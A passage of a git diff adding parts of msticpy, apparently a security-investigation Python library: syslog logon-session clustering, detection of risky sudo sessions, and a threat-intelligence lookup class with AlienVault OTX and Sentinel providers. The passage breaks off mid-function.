+        ip_entity.Address = host_hb["ComputerIP"]
+        geoloc_entity = GeoLocation()
+        geoloc_entity.CountryName = host_hb["RemoteIPCountry"]  # type: ignore
+        geoloc_entity.Longitude = host_hb["RemoteIPLongitude"]  # type: ignore
+        geoloc_entity.Latitude = host_hb["RemoteIPLatitude"]  # type: ignore
+        ip_entity.Location = geoloc_entity  # type: ignore
+        host_entity.IPAddress = ip_entity  # type: ignore
+
+    # If Azure network data present add this to host record
+    if az_net_df is not None and not az_net_df.empty:
+        if len(az_net_df) == 1:
+            priv_addr_str = az_net_df["PrivateIPAddresses"].loc[0]
+            host_entity["private_ips"] = convert_to_ip_entities(priv_addr_str)
+            pub_addr_str = az_net_df["PublicIPAddresses"].loc[0]
+            host_entity["public_ips"] = convert_to_ip_entities(pub_addr_str)
+        else:
+            if "private_ips" not in host_entity:
+                host_entity["private_ips"] = []
+            if "public_ips" not in host_entity:
+                host_entity["public_ips"] = []
+
+    return host_entity
+
+
+@export
+def cluster_syslog_logons_df(logon_events: pd.DataFrame) -> pd.DataFrame:
+    """
+    Cluster logon sessions in syslog by start/end time based on PAM events.
+
+    Parameters
+    ----------
+    logon_events: pd.DataFrame
+        A DataFrame of all syslog logon events
+        (can be generated with LinuxSyslog.user_logon query)
+
+    Returns
+    -------
+    logon_sessions: pd.DataFrame
+        A dictionary of logon sessions including start and end times
+        and logged on user
+
+    Raises
+    ------
+    MsticpyException
+        There are no logon sessions in the supplied data set
+
+    """
+    users = []
+    starts = []
+    ends = []
+    ses_close_time = logon_events["TimeGenerated"].max()
+    ses_opened = 0
+    ses_closed = 0
+    # Extract logon session opened and logon session closed data.
+    logons_opened = (
+        (
+            logon_events[
+                logon_events["SyslogMessage"].str.contains("pam_unix.+session opened")
+            ]
+        )
+        .set_index("TimeGenerated")
+        .sort_index(ascending=True)
+    )
+    logons_closed = (
+        (
+            logon_events[
+                logon_events["SyslogMessage"].str.contains("pam_unix.+session closed")
+            ]
+        )
+        .set_index("TimeGenerated")
+        .sort_index(ascending=True)
+    )
+    if logons_opened.empty or logons_closed.empty:
+        raise MsticpyException("There are no logon sessions in the supplied data set")
+
+    # For each session identify the likely start and end times
+    while ses_opened < len(logons_opened.index) and ses_closed < len(
+        logons_closed.index
+    ):
+        ses_start = (logons_opened.iloc[ses_opened]).name
+        ses_end = (logons_closed.iloc[ses_closed]).name
+        # If we can identify a user for the session add this to the details
+        if "User" in logons_opened.columns:
+            user = (logons_opened.iloc[ses_opened]).User
+        elif "Sudoer" in logons_opened.columns:
+            user = (logons_opened.iloc[ses_opened]).Sudoer
+        else:
+            user = "Unknown"
+        if ses_start <= ses_close_time and ses_opened != 0:
+            ses_opened += 1
+            continue
+        if ses_end < ses_start:
+            ses_closed += 1
+            continue
+        users.append(user)
+        starts.append(ses_start)
+        ends.append(ses_end)
+        ses_close_time = ses_end
+        ses_closed += 1
+        ses_opened += 1
+    return pd.DataFrame({"User": users, "Start": starts, "End": ends})
+
+
+@export
+def risky_sudo_sessions(
+    sudo_sessions: pd.DataFrame,
+    risky_actions: dict = None,
+    suspicious_actions: list = None,
+) -> dict:
+    """
+    Detect if a sudo session occurs at the point of a suspicious event.
+
+    Parameters
+    ----------
+    sudo_sessions: dict
+        Dictionary of sudo sessions (as generated by cluster_syslog_logons)
+    risky_actions: dict (Optional)
+        Dictionary of risky sudo commands (as generated by cmd_line.risky_cmd_line)
+    suspicious_actions: list (Optional)
+        List of risky sudo commands (as generated by cmd_line.cmd_speed)
+
+    Returns
+    -------
+    risky_sessions: dict
+        A dictionary of sudo sessions with flags denoting risk
+
+    """
+    sessions = sudo_sessions[["User", "Start", "End"]].to_dict("index")
+
+    if risky_actions is None and suspicious_actions is None:
+        raise MsticpyException(
+            "At least one of risky_actions or suspicious_actions must be supplied"
+        )
+
+    # Depending on whether we have risky or suspicious acitons or both
+    # identify sessions which these actions occur in
+    risky_act_sessions: Dict[str, Any] = {}
+    susp_act_sessions: Dict[str, Any] = {}
+    if risky_actions is not None:
+        risky_act_sessions = _find_risky_sudo_session(
+            risky_actions=risky_actions, sudo_sessions=sessions
+        )
+    if suspicious_actions is not None:
+        susp_act_sessions = _find_suspicious_sudo_session(
+            suspicious_actions=suspicious_actions, sudo_sessions=sessions
+        )
+    return {**risky_act_sessions, **susp_act_sessions}
+
+
+def _normalize_to_utc(time_stamp: dt.datetime):
+    # Normalize datetimes to UTC in case we have mixed timezones in datasets
+    if time_stamp.tzinfo is None or time_stamp.tzinfo.utcoffset(time_stamp) is None:
+        time_stamp = time_stamp.replace(tzinfo=pytz.UTC)
+    else:
+        time_stamp = time_stamp.astimezone(pytz.utc)
+    return time_stamp
+
+
+def _find_risky_sudo_session(risky_actions: dict, sudo_sessions: dict):
+    risky_sessions = {}
+    # Determine if risky event occurs during a session time window
+    for key, value in risky_actions.items():
+        for sess_key, sess_val in sudo_sessions.items():
+            if (
+                _normalize_to_utc(sess_val["Start"])
+                <= _normalize_to_utc(key)
+                <= _normalize_to_utc(sess_val["End"])
+            ):
+                risky_sessions.update({sess_key: value})
+    return risky_sessions
+
+
+def _find_suspicious_sudo_session(suspicious_actions: list, sudo_sessions: dict):
+    risky_sessions = {}
+    # Determine if suspicious event occurs during a session time window
+    for event in suspicious_actions:
+        for value in event.values():
+            for sess_key, sess_val in sudo_sessions.items():
+                if (
+                    _normalize_to_utc(sess_val["Start"])
+                    <= _normalize_to_utc(value[0]["TimeGenerated"].iloc[1])
+                    <= _normalize_to_utc(sess_val["End"])
+                ):
+                    risky_sessions.update({sess_key: "Suspicious event pattern"})
+    return risky_sessions
diff --git a/msticpy/sectools/tilookup.py b/msticpy/sectools/tilookup.py
new file mode 100644
index 000000000..a84cf3b62
--- /dev/null
+++ b/msticpy/sectools/tilookup.py
@@ -0,0 +1,629 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""
+Module for TILookup classes.
+
+Input can be a single IoC observable or a pandas DataFrame containing
+multiple observables. Processing may require a an API key and
+processing performance may be limited to a specific number of
+requests per minute for the account type that you have.
+
+"""
+import sys  # noqa
+import warnings
+from collections import ChainMap
+from inspect import isclass
+from typing import Dict, Iterable, List, Mapping, Optional, Tuple, Union
+
+import attr
+import pandas as pd
+
+from .._version import VERSION
+from ..common.exceptions import MsticpyConfigException, MsticpyUserConfigError
+from ..common.provider_settings import get_provider_settings, reload_settings
+from ..common.utility import export
+from ..nbtools.ti_browser import browse_results
+from . import tiproviders
+
+# used in dynamic instantiation of providers
+# pylint: disable=unused-wildcard-import, wildcard-import
+from .tiproviders import *  # noqa:F401, F403
+from .tiproviders.ti_provider_base import LookupResult, TILookupStatus, TIProvider
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+_NO_PROVIDERS_MSSG = """
+No TI Providers are loaded - please check that
+you have correctly configured your msticpyconfig.yaml settings.
+"""
+_TI_HELP_URI = (
+    "https://msticpy.readthedocs.io/en/latest/data_acquisition/"
+    "TIProviders.html#configuration-file"
+)
+
+
+@export
+class TILookup:
+    """Threat Intel observable lookup from providers."""
+
+    def __init__(
+        self,
+        primary_providers: Optional[List[TIProvider]] = None,
+        secondary_providers: Optional[List[TIProvider]] = None,
+        providers: Optional[List[str]] = None,
+    ):
+        """
+        Initialize TILookup instance.
+
+        Parameters
+        ----------
+        primary_providers : Optional[List[TIProvider]], optional
+            Primary TI Providers, by default None
+        secondary_providers : Optional[List[TIProvider]], optional
+            Secondary TI Providers, by default None
+        providers: Optional[List[str]], optional
+            List of provider names to load, by default all available
+            providers are loaded. To see the list of available providers
+            call `TILookup.list_available_providers()`.
+            Note: if primary_provides or secondary_providers is specified
+            This will override the providers list.
+
+        """
+        self._providers: Dict[str, TIProvider] = {}
+        self._secondary_providers: Dict[str, TIProvider] = {}
+        self._providers_to_load = providers
+
+        if primary_providers:
+            for prov in primary_providers:
+                self.add_provider(prov, primary=True)
+        if secondary_providers:
+            for prov in secondary_providers:
+                self.add_provider(prov, primary=False)
+        if not (primary_providers or secondary_providers):
+            self._load_providers()
+
+        self._all_providers = ChainMap(self._secondary_providers, self._providers)
+
+    @property
+    def loaded_providers(self) -> Dict[str, TIProvider]:
+        """
+        Return dictionary of loaded providers.
+
+        Returns
+        -------
+        Dict[str, TIProvider]
+            [description]
+
+        """
+        return self._all_providers  # type: ignore
+
+    @property
+    def provider_status(self) -> Iterable[str]:
+        """
+        Return loaded provider status.
+
+        Returns
+        -------
+        Iterable[str]
+            List of providers and descriptions.
+
+        """
+        prim = [
+            f"{prov_name} - {prov.description} (primary)"
+            for prov_name, prov in self._providers.items()
+        ]
+        sec = [
+            f"{prov_name} - {prov.description} (secondary)"
+            for prov_name, prov in self._secondary_providers.items()
+        ]
+        return prim + sec
+
+    @property
+    def configured_providers(self) -> List[str]:
+        """
+        Return a list of avaliable providers that have configuration details present.
+
+        Returns
+        -------
+        List[str]
+            List of TI Provider classes.
+
+        """
+        prim_conf = list(self._providers.keys())
+        sec_conf = list(self._secondary_providers.keys())
+
+        return prim_conf + sec_conf
+
+    @property
+    def available_providers(self) -> List[str]:
+        """
+        Return a list of builtin providers.
+
+        Returns
+        -------
+        List[str]
+            List of TI Provider classes.
+
+        """
+        return self._get_available_providers()
+
+    @classmethod
+    def _get_available_providers(cls):
+        providers = []
+        for provider_name in dir(tiproviders):
+            provider_class = getattr(tiproviders, provider_name, None)
+            if not (provider_class and isclass(provider_class)):
+                continue
+            # if it is a class - we only want to show concrete classes
+            # that are sub-classes of TIProvider
+            if issubclass(provider_class, tiproviders.TIProvider) and not bool(
+                getattr(provider_class, "__abstractmethods__", False)
+            ):
+                providers.append(provider_class.__name__)
+        return providers
+
+    def enable_provider(self, providers: Union[str, Iterable[str]]):
+        """
+        Set the provider(s) as primary (used by default).
+
+        Parameters
+        ----------
+        providers : Union[str, Iterable[str]
+            Provider name or list of names.
+            Use `list_available_providers()` to see the list of loaded providers.
+
+        Raises
+        ------
+        ValueError
+            If the provider name is not recognized.
+
+        """
+        providers = [providers] if isinstance(providers, str) else providers
+        for provider in providers:
+            if provider in self._secondary_providers:
+                self._providers[provider] = self._secondary_providers[provider]
+                del self._secondary_providers[provider]
+            elif provider not in self._providers:
+                raise ValueError(
+                    f"Unknown provider '{provider}'. Available providers:",
+                    ", ".join(self.list_available_providers(as_list=True)),  # type: ignore
+                )
+        # disable all other providers
+        for provider in self._providers:
+            if provider not in providers:
+                self.disable_provider(provider)
+
+    def disable_provider(self, providers: Union[str, Iterable[str]]):
+        """
+        Set the provider as secondary (not used by default).
+
+        Parameters
+        ----------
+        providers : Union[str, Iterable[str]
+            Provider name or list of names.
+            Use `list_available_providers()` to see the list of loaded providers.
+
+        Raises
+        ------
+        ValueError
+            If the provider name is not recognized.
+
+        """
+        providers = [providers] if isinstance(providers, str) else providers
+        for provider in providers:
+            if provider in self._providers:
+                self._secondary_providers[provider] = self._providers[provider]
+                del self._providers[provider]
+            elif provider not in self._secondary_providers:
+                raise ValueError(
+                    f"Unknown provider '{provider}'. Available providers:",
+                    ", ".join(self.list_available_providers(as_list=True)),  # type: ignore
+                )
+
+    def set_provider_state(self, prov_dict: Dict[str, bool]):
+        """
+        Set a dict of providers to primary/secondary.
+
+        Parameters
+        ----------
+        prov_dict : Dict[str, bool]
+            Dictionary of provider name and bool - True if enabled/primary,
+            False if disabled/secondary.
+
+        """
+        for prov, state in prov_dict.items():
+            if state:
+                self.enable_provider(prov)
+            else:
+                self.disable_provider(prov)
+
+    @classmethod
+    def list_available_providers(
+        cls, show_query_types=False, as_list: bool = False
+    ) -> Optional[List[str]]:  # type: ignore
+        """
+        Print a list of builtin providers with optional usage.
+
+        Parameters
+        ----------
+        show_query_types : bool, optional
+            Show query types supported by providers, by default False
+        as_list : bool, optional
+            Return list of providers instead of printing to stdout.
+            Note: if you specify `show_query_types` this will be printed
+            irrespective of this parameter setting.
+
+        Returns
+        -------
+        Optional[List[str]]
+            A list of provider names (if `return_list=True`)
+
+        """
+        providers = []
+        for provider_name in cls._get_available_providers():
+            provider_class = getattr(tiproviders, provider_name, None)
+            if not as_list:
+                print(provider_name)
+            providers.append(provider_name)
+            if show_query_types and provider_class:
+                provider_class.usage()
+
+        if as_list:
+            return providers
+        return None
+
+    def provider_usage(self):
+        """Print usage of loaded providers."""
+        print("Primary providers")
+        print("-----------------")
+        if self._providers:
+            for prov_name, prov in self._providers.items():
+                print(f"\nProvider class: {prov_name}")
+                prov.usage()
+        else:
+            print("none")
+        print("\nSecondary providers")
+        print("-------------------")
+        if self._secondary_providers:
+            for prov_name, prov in self._secondary_providers.items():
+                print(f"\nProvider class: {prov_name}")
+                prov.usage()
+        else:
+            print("none")
+
+    @classmethod
+    def reload_provider_settings(cls):
+        """Reload provider settings from config."""
+        reload_settings()
+        print(
+            "Settings reloaded. Use reload_providers to update settings",
+            "for loaded providers.",
+        )
+
+    def reload_providers(self):
+        """
+        Reload providers based on current settings in config.
+
+        Parameters
+        ----------
+        clear_keyring : bool, optional
+            Clears any secrets cached in keyring, by default False
+
+        """
+        self.reload_provider_settings()
+        self._load_providers()
+
+    def _load_providers(self):
+        """Load provider classes based on config."""
+        prov_settings = get_provider_settings()
+
+        for provider_entry, settings in prov_settings.items():
+            # Allow overriding provider name to use another class
+            provider_name = settings.provider or provider_entry
+            if self._providers_to_load and provider_name not in self._providers_to_load:
+                continue
+            provider_class: TIProvider = getattr(
+                sys.modules[__name__], provider_name, None
+            )
+            if not provider_class:
+                warnings.warn(
+                    f"Could not find provider class for {provider_name} "
+                    f"in config section {provider_entry}"
+                )
+                continue
+
+            # instantiate class sending args from settings to init
+            try:
+                provider_instance = provider_class(**(settings.args))
+            except MsticpyConfigException as mp_ex:
+                # If the TI Provider didn't load, raise an exception
+                raise MsticpyUserConfigError(
+                    f"Could not load TI Provider {provider_name}",
+                    *mp_ex.args,
+                    "To avoid loading this provider please use the 'providers' parameter"
+                    + " to TILookup() to specify which providers to load.",
+                    title="TIProvider configuration error",
+                    help_uri=(
+                        "https://msticpy.readthedocs.io/en/latest/data_acquisition/TIProviders.html"
+                        + "#configuration-file"
+                    ),
+                ) from mp_ex
+
+            # set the description from settings, if one is provided, otherwise
+            # use class docstring.
+            provider_instance.description = (
+                settings.description or provider_instance.__doc__
+            )
+
+            self.add_provider(
+                provider=provider_instance, name=provider_name, primary=settings.primary
+            )
+
+    def add_provider(
+        self, provider: TIProvider, name: str = None, primary: bool = True
+    ):
+        """
+        Add a TI provider to the current collection.
+
+        Parameters
+        ----------
+        provider : TIProvider
+            Provider instance
+        name : str, optional
+            The name to use for the provider (overrides the class name
+            of `provider`)
+        primary : bool, optional
+            "primary" or "secondary" if False, by default "primary"
+
+        """
+        if not name:
+            name = provider.__class__.__name__
+        if primary:
+            self._providers[name] = provider
+        else:
+            self._secondary_providers[name] = provider
+
+    # pylint: disable=too-many-arguments
+    def lookup_ioc(
+        self,
+        observable: str = None,
+        ioc_type: str = None,
+        ioc_query_type: str = None,
+        providers: List[str] = None,
+        prov_scope: str = "primary",
+        **kwargs,
+    ) -> Tuple[bool, List[Tuple[str, LookupResult]]]:
+        """
+        Lookup single IoC in active providers.
+
+        Parameters
+        ----------
+        observable : str
+            IoC observable
+            (`ioc` is also an alias for observable)
+        ioc_type : str, optional
+            One of IoCExtract.IoCType, by default None
+            If none, the IoC type will be inferred
+        ioc_query_type: str, optional
+            The ioc query type (e.g. rep, info, malware)
+        providers: List[str]
+            Explicit list of providers to use
+        prov_scope : str, optional
+            Use "primary", "secondary" or "all" providers, by default "primary"
+        kwargs :
+            Additional arguments passed to the underlying provider(s)
+
+        Returns
+        -------
+        Tuple[bool, List[Tuple[str, LookupResult]]]
+            The result returned as a tuple(bool, list):
+            bool indicates whether a TI record was found in any provider
+            list has an entry for each provider result
+
+        """
+        if not observable and "ioc" in kwargs:
+            observable = kwargs["ioc"]
+        if not observable:
+            raise ValueError("observable or ioc parameter must be supplied.")
+
+        result_list: List[Tuple[str, LookupResult]] = []
+        selected_providers = self._select_providers(providers, prov_scope)
+        if not selected_providers:
+            raise MsticpyUserConfigError(
+                _NO_PROVIDERS_MSSG,
+                title="No Threat Intel Provider configuration found.",
+                help_uri=_TI_HELP_URI,
+            )
+
+        ioc_type = ioc_type or TIProvider.resolve_ioc_type(observable)
+        for prov_name, provider in selected_providers.items():
+            provider_result: LookupResult = provider.lookup_ioc(
+                ioc=observable, ioc_type=ioc_type, query_type=ioc_query_type, **kwargs
+            )
+            result_list.append((prov_name, provider_result))
+        overall_result = any(res.result for _, res in result_list)
+        return overall_result, result_list
+
+    def lookup_iocs(
+        self,
+        data: Union[pd.DataFrame, Mapping[str, str], Iterable[str]],
+        obs_col: str = None,
+        ioc_type_col: str = None,
+        ioc_query_type: str = None,
+        providers: List[str] = None,
+        prov_scope: str = "primary",
+        **kwargs,
+    ) -> pd.DataFrame:
+        """
+        Lookup a collection of IoCs.
+
+        Parameters
+        ----------
+        data : Union[pd.DataFrame, Mapping[str, str], Iterable[str]]
+            Data input in one of three formats:
+            1. Pandas dataframe (you must supply the column name in
+            `obs_col` parameter)
+            2. Mapping (e.g. a dict) of [observable, IoCType]
+            3. Iterable of observables - IoCTypes will be inferred
+        obs_col : str, optional
+            DataFrame column to use for observables, by default None
+            ("col" and "column" are also aliases for this parameter)
+        ioc_type_col : str, optional
+            DataFrame column to use for IoCTypes, by default None
+        ioc_query_type: str, optional
+            The ioc query type (e.g. rep, info, malware)
+        providers: List[str]
+            Explicit list of providers to use
+        prov_scope : str, optional
+            Use "primary", "secondary" or "all" providers, by default "primary"
+        kwargs :
+            Additional arguments passed to the underlying provider(s)
+
+        Returns
+        -------
+        pd.DataFrame
+            DataFrame of results
+
+        """
+        obs_col = obs_col or kwargs.pop("col", kwargs.pop("column", None))
+
+        result_list: List[pd.DataFrame] = []
+        selected_providers = self._select_providers(providers, prov_scope)
+        if not selected_providers:
+            raise MsticpyUserConfigError(
+                _NO_PROVIDERS_MSSG,
+                title="No Threat Intel Provider configuration found.",
+                help_uri=_TI_HELP_URI,
+            )
+
+        for prov_name, provider in selected_providers.items():
+            provider_result = provider.lookup_iocs(
+                data=data,
+                obs_col=obs_col,
+                ioc_type_col=ioc_type_col,
+                query_type=ioc_query_type,
+                **kwargs,
+            )
+            if provider_result is None or provider_result.empty:
+                continue
+            if not kwargs.get("show_not_supported", False):
+                provider_result = provider_result[
+                    provider_result["Status"] != TILookupStatus.not_supported.value
+                ]
+            if not kwargs.get("show_bad_ioc", False):
+                provider_result = provider_result[
+                    provider_result["Status"] != TILookupStatus.bad_format.value
+                ]
+            provider_result["Provider"] = prov_name
+            result_list.append(provider_result)
+
+        if not result_list:
+            print("No IoC matches")
+        return pd.concat(result_list, sort=False)
+
+    @staticmethod
+    def result_to_df(
+        ioc_lookup: Tuple[bool, List[Tuple[str, LookupResult]]]
+    ) -> pd.DataFrame:
+        """
+        Return DataFrame representation of IoC Lookup response.
+
+        Parameters
+        ----------
+        ioc_lookup : Tuple[bool, List[Tuple[str, LookupResult]]]
+            Output from `lookup_ioc`
+
+        Returns
+        -------
+        pd.DataFrame
+            The response as a DataFrame with a row for each
+            provider response.
+
+        """
+        return (
+            pd.DataFrame(
+                {
+                    r_item[0]: pd.Series(attr.asdict(r_item[1]))
+                    for r_item in ioc_lookup[1]
+                }
+            )
+            .T.rename(columns=LookupResult.column_map())
+            .drop("SafeIoc", axis=1)
+        )
+
+    def _select_providers(
+        self, providers: List[str] = None, prov_scope: str = "primary"
+    ) -> Dict[str, TIProvider]:
+        """
+        Return required subset of providers.
+
+        Parameters
+        ----------
+        providers : List[str], optional
+            Explicit list of provider names, by default None
+        prov_scope : str, optional
+            Provider scope, by default "primary"
+            Other values are "all" and "secondary"
+
+        Returns
+        -------
+        Dict[str, TIProvider]
+            Dictionary of provider names and instances.
+
+        """
+        if providers:
+            return {
+                prov_name: prov
+                for prov_name, prov in self._all_providers.items()
+                if prov_name in providers
+            }
+        if prov_scope == "all":
+            return dict(self._all_providers)
+        if prov_scope == "primary":
+            return self._providers
+        return self._secondary_providers
+
+    @classmethod
+    def browse_results(
+        cls, data: pd.DataFrame, severities: Optional[List[str]] = None, **kwargs
+    ):
+        """
+        Return TI Results list browser.
+
+        Parameters
+        ----------
+        data : pd.DataFrame
+            TI Results data from TIProviders
+        severities : Optional[List[str]], optional
+            A list of the severity classes to show.
+            By default these are ['warning', 'high'].
+            Pass ['information', 'warning', 'high'] to see all
+            results.
+
+        Other Parameters
+        ----------------
+        kwargs :
+            passed to SelectItem constructor.
+
+        Returns
+        -------
+        SelectItem
+            SelectItem browser for TI Data.
+
+        """
+        if not isinstance(data, pd.DataFrame):
+            try:
+                data = cls.result_to_df(data)
+            # pylint: disable=broad-except
+            except Exception:
+                print("Input data is in an unexpected format.")
+                return None
+            # pylint: enable=broad-except
+        return browse_results(data=data, severities=severities, **kwargs)
+
+    browse = browse_results
diff --git a/msticpy/sectools/tiproviders/__init__.py b/msticpy/sectools/tiproviders/__init__.py
new file mode 100644
index 000000000..065de19fa
--- /dev/null
+++ b/msticpy/sectools/tiproviders/__init__.py
@@ -0,0 +1,27 @@
+"""TI Providers sub-package."""
+from ..._version import VERSION
+from ...common.provider_settings import (  # noqa:F401
+    ProviderSettings,
+    get_provider_settings,
+)
+from .alienvault_otx import OTX  # noqa:F401
+from .azure_sent_byoti import AzSTI  # noqa:F401
+from .greynoise import GreyNoise  # noqa:F401
+from .http_base import HttpProvider  # noqa:F401
+from .ibm_xforce import XForce  # noqa:F401
+from .open_page_rank import OPR  # noqa:F401
+from .ti_provider_base import (  # noqa:F401
+    LookupResult,
+    TIProvider,
+    preprocess_observable,
+)
+from .tor_exit_nodes import Tor  # noqa:F401
+from .virustotal import VirusTotal  # noqa:F401
+from .intsights import IntSights  # noqa:F401
+
+try:
+    from .riskiq import RiskIQ  # noqa:F401
+except ImportError:
+    pass
+
+__version__ = VERSION
diff --git a/msticpy/sectools/tiproviders/alienvault_otx.py b/msticpy/sectools/tiproviders/alienvault_otx.py
new file mode 100644
index 000000000..262d370c3
--- /dev/null
+++ b/msticpy/sectools/tiproviders/alienvault_otx.py
@@ -0,0 +1,124 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""
+AlienVault OTX Provider.
+
+Input can be a single IoC observable or a pandas DataFrame containing
+multiple observables. Processing may require a an API key and
+processing performance may be limited to a specific number of
+requests per minute for the account type that you have.
+
+"""
+from typing import Any, Tuple
+
+import attr
+
+from .ti_provider_base import LookupResult, TISeverity
+from .http_base import HttpProvider, IoCLookupParams
+from ...common.utility import export
+from ..._version import VERSION
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=too-few-public-methods
+@attr.s
+class _OTXParams(IoCLookupParams):
+    # override IoCLookupParams to set common defaults
+    def __attrs_post_init__(self):
+        self.headers = {"X-OTX-API-KEY": "{API_KEY}"}
+
+
+@export
+class OTX(HttpProvider):
+    """AlientVault OTX Lookup."""
+
+    _BASE_URL = "https://otx.alienvault.com"
+
+    _IOC_QUERIES = {
+        "ipv4": _OTXParams(path="/api/v1/indicators/IPv4/{observable}/general"),
+        "ipv6": _OTXParams(path="/api/v1/indicators/IPv6/{observable}/general"),
+        "ipv4-passivedns": _OTXParams(
+            path="/api/v1/indicators/IPv4/{observable}/passive_dns"
+        ),
+        "ipv6-passivedns": _OTXParams(
+            path="/api/v1/indicators/IPv6/{observable}/passive_dns"
+        ),
+        "ipv4-geo": _OTXParams(path="/api/v1/indicators/IPv4/{observable}/geo"),
+        "ipv6-geo": _OTXParams(path="/api/v1/indicators/IPv6/{observable}/geo"),
+        "dns": _OTXParams(path="/api/v1/indicators/domain/{observable}/general"),
+        "dns-passivedns": _OTXParams(
+            path="/api/v1/indicators/domain/{observable}/passive_dns"
+        ),
+        "dns-geo": _OTXParams(path="/api/v1/indicators/domain/{observable}/geo"),
+        "hostname": _OTXParams(path="/api/v1/indicators/hostname/{observable}/general"),
+        "file_hash": _OTXParams(path="/api/v1/indicators/file/{observable}/general"),
+        "url": _OTXParams(path="/api/v1/indicators/url/{observable}/general"),
+    }
+
+    # pylint: disable=duplicate-code
+    # aliases
+    _IOC_QUERIES["md5_hash"] = _IOC_QUERIES["file_hash"]
+    _IOC_QUERIES["sha1_hash"] = _IOC_QUERIES["file_hash"]
+    _IOC_QUERIES["sha256_hash"] = _IOC_QUERIES["file_hash"]
+
+    _REQUIRED_PARAMS = ["API_KEY"]
+
+    def __init__(self, **kwargs):
+        """Set OTX specific settings."""
+        super().__init__(**kwargs)
+        self.require_url_encoding = True
+
+    def parse_results(self, response: LookupResult) -> Tuple[bool, TISeverity, Any]:
+        """
+        Return the details of the response.
+
+        Parameters
+        ----------
+        response : LookupResult
+            The returned data response
+
+        Returns
+        -------
+        Tuple[bool, TISeverity, Any]
+            bool = positive or negative hit
+            TISeverity = enumeration of severity
+            Object with match details
+
+        """
+        if self._failed_response(response) or not isinstance(response.raw_result, dict):
+            return False, TISeverity.information, "Not found."
+        if "pulse_info" in response.raw_result:
+            pulses = response.raw_result["pulse_info"].get("pulses", {})
+            pulse_count = len(pulses)
+            if pulse_count == 0:
+                severity = TISeverity.information
+                return (
+                    True,
+                    severity,
+                    {
+                        "pulse_count": pulse_count,
+                        "sections_available": response.raw_result["sections"],
+                    },
+                )
+            if pulse_count == 1:
+                severity = TISeverity.warning
+            else:
+                severity = TISeverity.high
+            return (
+                True,
+                severity,
+                {
+                    "pulse_count": pulse_count,
+                    "names": [p.get("name") for p in pulses],
+                    "tags": [p.get("tags") for p in pulses],
+                    "references": [p.get("references") for p in pulses],
+                },
+            )
+        return True, TISeverity.information, {}
+
+    # pylint: enable=duplicate-code
diff --git a/msticpy/sectools/tiproviders/azure_sent_byoti.py b/msticpy/sectools/tiproviders/azure_sent_byoti.py
new file mode 100644
index 000000000..f9b2bda65
--- /dev/null
+++ b/msticpy/sectools/tiproviders/azure_sent_byoti.py
@@ -0,0 +1,129 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""
+Microsoft Sentinel TI provider class.
+
+Input can be a single IoC observable or a pandas DataFrame containing
+multiple observables. Processing may require a an API key and
+processing performance may be limited to a specific number of
+requests per minute for the account type that you have.
+
+"""
+from typing import Any, Dict, Tuple
+
+import pandas as pd
+
+from ..._version import VERSION
+from ...common.utility import export
+from .ti_provider_base import LookupResult, TISeverity
+from .kql_base import KqlTIProvider
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+@export
+class AzSTI(KqlTIProvider):
+    """Microsoft Sentinel TI provider class."""
+
+    _IOC_QUERIES: Dict[str, tuple] = {
+        "ipv4": ("ThreatIntelligence.list_indicators_by_ip", {"ioc": "observables"}),
+        "file_hash": (
+            "ThreatIntelligence.list_indicators_by_hash",
+            {"ioc": "observables"},
+        ),
+        "windows_path": (
+            "ThreatIntelligence.list_indicators_by_filepath",
+            {"ioc": "observables"},
+        ),
+        "dns": ("ThreatIntelligence.list_indicators_by_domain", {"ioc": "observables"}),
+        "url": ("ThreatIntelligence.list_indicators_by_url", {"ioc": "observables"}),
+    }
+
+    # aliases
+    _IOC_QUERIES["ipv6"] = _IOC_QUERIES["ipv4"]
+    _IOC_QUERIES["md5_hash"] = _IOC_QUERIES["file_hash"]
+    _IOC_QUERIES["sha1_hash"] = _IOC_QUERIES["file_hash"]
+    _IOC_QUERIES["sha256_hash"] = _IOC_QUERIES["file_hash"]
+    _IOC_QUERIES["linux_path"] = _IOC_QUERIES["windows_path"]
+    _IOC_QUERIES["hostname"] = _IOC_QUERIES["dns"]
+
+    def parse_results(self, response: LookupResult) -> Tuple[bool, TISeverity, Any]:
+        """
+        Return the details of the response.
+
+        Parameters
+        ----------
+        response : LookupResult
+            The returned data response
+
+        Returns
+        -------
+        Tuple[bool, TISeverity, Any]
+            bool = positive or negative hit
+            TISeverity = enumeration of severity
+            Object with match details
+
+        """
+        if response.raw_result is None:
+            return False, TISeverity.information, "No data"
+
+        severity = TISeverity.warning
+        # if this is a series (single row) return a dictionary
+        if isinstance(response.raw_result, pd.Series):
+            extracted_data = response.raw_result[
+                ["Action", "ThreatType", "ThreatSeverity", "Active", "ConfidenceScore"]
+            ].to_dict()
+            if extracted_data["Action"].lower() in ["alert", "block"]:
+                severity = TISeverity.high
+            return True, TISeverity.warning, extracted_data
+        # if this is a dataframe (multiple rows)
+        # concatenate the values for each column/record into a list
+        # and return as a dictionary
+        if isinstance(response.raw_result, pd.DataFrame):
+            d_frame = response.raw_result
+            if d_frame["Action"].str.lower().isin(["alert", "block"]).any():
+                severity = TISeverity.high
+
+            return (
+                True,
+                severity,
+                {
+                    "Action": self._series_to_list(d_frame["Action"]),
+                    "ThreatType": self._series_to_list(d_frame["ThreatType"]),
+                    "ThreatSeverity": self._series_to_list(d_frame["ThreatSeverity"]),
+                    "Active": self._series_to_list(d_frame["Active"]),
+                    "Description": self._series_to_list(d_frame["Description"]),
+                    "ConfidenceScore": self._series_to_list(d_frame["ConfidenceScore"]),
+                },
+            )
+        return False, TISeverity.information, "No data"
+
+    @staticmethod
+    def _get_detail_summary(data_result: pd.DataFrame) -> pd.Series:
+        # For the input frame return details in a series with
+        # Details in dict
+        return data_result.apply(
+            lambda x: {
+                "Action": x.Action,
+                "ThreatType": x.ThreatType,
+                "ThreatSeverity": x.ThreatSeverity,
+                "Active": x.Active,
+                "Description": x.Description,
